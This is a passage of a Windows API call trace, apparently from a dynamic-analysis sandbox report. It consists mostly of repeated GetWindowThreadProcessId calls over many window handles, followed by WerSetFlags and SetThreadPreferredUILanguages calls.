	[0613.889] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1178
	[0613.889] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x13e0
	[0613.889] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xcd0
	[0613.889] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x13fc
	[0613.889] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xdc8
	[0613.889] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xc18
	[0613.889] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xc2c
	[0613.889] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xa1c
	[0613.889] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1244
	[0613.890] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xdb0
	[0613.890] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1398
	[0613.890] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1358
	[0613.890] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1370
	[0613.890] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1340
	[0613.890] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x130c
	[0613.890] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x12c0
	[0613.890] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x12e4
	[0613.890] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1270
	[0613.890] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1298
	[0613.891] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x120c
	[0613.891] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x122c
	[0613.891] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x11c4
	[0613.891] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x11b0
	[0613.891] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1188
	[0613.891] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1148
	[0613.891] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1160
	[0613.891] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x10fc
	[0613.891] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xe34
	[0613.891] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xea4
	[0613.891] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x514
	[0613.892] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xe48
	[0613.892] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xbc8
	[0613.892] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xdf8
	[0613.892] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x318
	[0613.892] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xcac
	[0613.892] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x8bc
	[0613.892] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xf9c
	[0613.892] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xf48
	[0613.892] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xe40
	[0613.892] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xecc
	[0613.892] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xeb8
	[0613.893] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xe80
	[0613.893] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xe98
	[0613.893] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xe60
	[0613.893] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xee4
	[0613.893] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xf00
	[0613.893] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xdf0
	[0613.893] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xe1c
	[0613.893] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xdd0
	[0613.893] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xd94
	[0613.893] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xd74
	[0613.894] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xd00
	[0613.894] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xcd8
	[0613.894] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xc84
	[0613.894] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xca4
	[0613.894] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xc64
	[0613.894] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xc24
	[0613.894] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xb84
	[0613.894] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xbac
	[0613.894] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x384
	[0613.894] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xab8
	[0613.895] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x33c
	[0613.895] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xa44
	[0613.895] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xa64
	[0613.895] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x8a8
	[0613.895] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xaf0
	[0613.895] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x88c
	[0613.895] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xb04
	[0613.895] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x910
	[0613.895] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x230
	[0613.895] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xac0
	[0613.896] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xab4
	[0613.896] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xaac
	[0613.896] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x3d0
	[0613.896] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x978
	[0613.896] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xa7c
	[0613.896] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x59c
	[0613.896] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xa88
	[0613.896] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xa6c
	[0613.896] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xa68
	[0613.896] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x9f8
	[0613.897] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xa04
	[0613.897] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x924
	[0613.897] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x8dc
	[0613.897] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x7dc
	[0613.897] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x768
	[0613.897] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x764
	[0613.897] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x820
	[0613.897] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x810
	[0613.897] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x794
	[0613.897] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x83c
	[0613.897] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x7ac
	[0613.898] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xb44
	[0613.898] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xb5c
	[0613.898] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x838
	[0613.898] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.898] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.898] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.898] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.898] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.898] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.898] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.898] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.899] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x818
	[0613.899] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x5b8
	[0613.899] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x494
	[0613.899] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1ec
	[0613.899] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x440
	[0613.899] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x7e8
	[0613.899] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x730
	[0613.899] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x2c8
	[0613.899] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x31c
	[0613.899] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x330
	[0613.900] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x128
	[0613.900] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x5c8
	[0613.900] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x6f8
	[0613.900] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x358
	[0613.900] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x73c
	[0613.900] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xb0
	[0613.900] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x250
	[0613.900] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x240
	[0613.900] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x790
	[0613.900] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x61c
	[0613.901] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x540
	[0613.901] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x538
	[0613.901] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x568
	[0613.901] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x538
	[0613.901] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x568
	[0613.901] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x538
	[0613.901] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x540
	[0613.901] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x540
	[0613.901] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x57c
	[0613.901] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x460
	[0613.902] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x554
	[0613.902] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.902] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x528
	[0613.902] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.902] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.902] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.902] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x79c
	[0613.902] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.902] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4e0
	[0613.902] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.902] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x460
	[0613.903] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x460
	[0613.903] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x44c
	[0613.903] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x778
	[0613.903] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x460
	[0613.903] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x558
	[0613.903] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.903] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0613.903] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1bb4
	[0613.903] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x10bc
	[0613.903] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1b50
	[0613.904] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x14b4
	[0613.904] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x149c
	[0613.904] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x14a8
	[0613.904] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1490
	[0613.904] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x14a4
	[0613.904] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x148c
	[0613.904] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1458
	[0613.904] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1b4c
	[0613.904] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1b3c
	[0613.904] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x19bc
	[0613.905] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x199c
	[0613.905] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1998
	[0613.905] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1994
	[0613.905] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1990
	[0613.905] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1984
	[0613.905] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x197c
	[0613.905] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1978
	[0613.905] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1824
	[0613.905] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1088
	[0613.905] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1908
	[0613.906] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x18cc
	[0613.906] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x18d0
	[0613.906] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1840
	[0613.906] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x10c4
	[0613.906] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x128c
	[0613.906] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x16e8
	[0613.906] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x16cc
	[0613.906] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x274
	[0613.906] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x10e0
	[0613.906] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x10cc
	[0613.907] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x10c0
	[0613.907] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x10d0
	[0613.907] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1198
	[0613.907] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1080
	[0613.907] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1074
	[0613.907] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x106c
	[0613.907] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1474
	[0613.907] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1414
	[0613.907] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xbd0
	[0613.907] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x550
	[0613.908] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xa38
	[0613.908] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x16d0
	[0613.908] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x16d4
	[0613.908] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x15bc
	[0613.908] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x15a0
	[0613.908] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x159c
	[0613.908] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1598
	[0613.908] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1594
	[0613.913] WerSetFlags () returned 0x0
	[0614.989] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
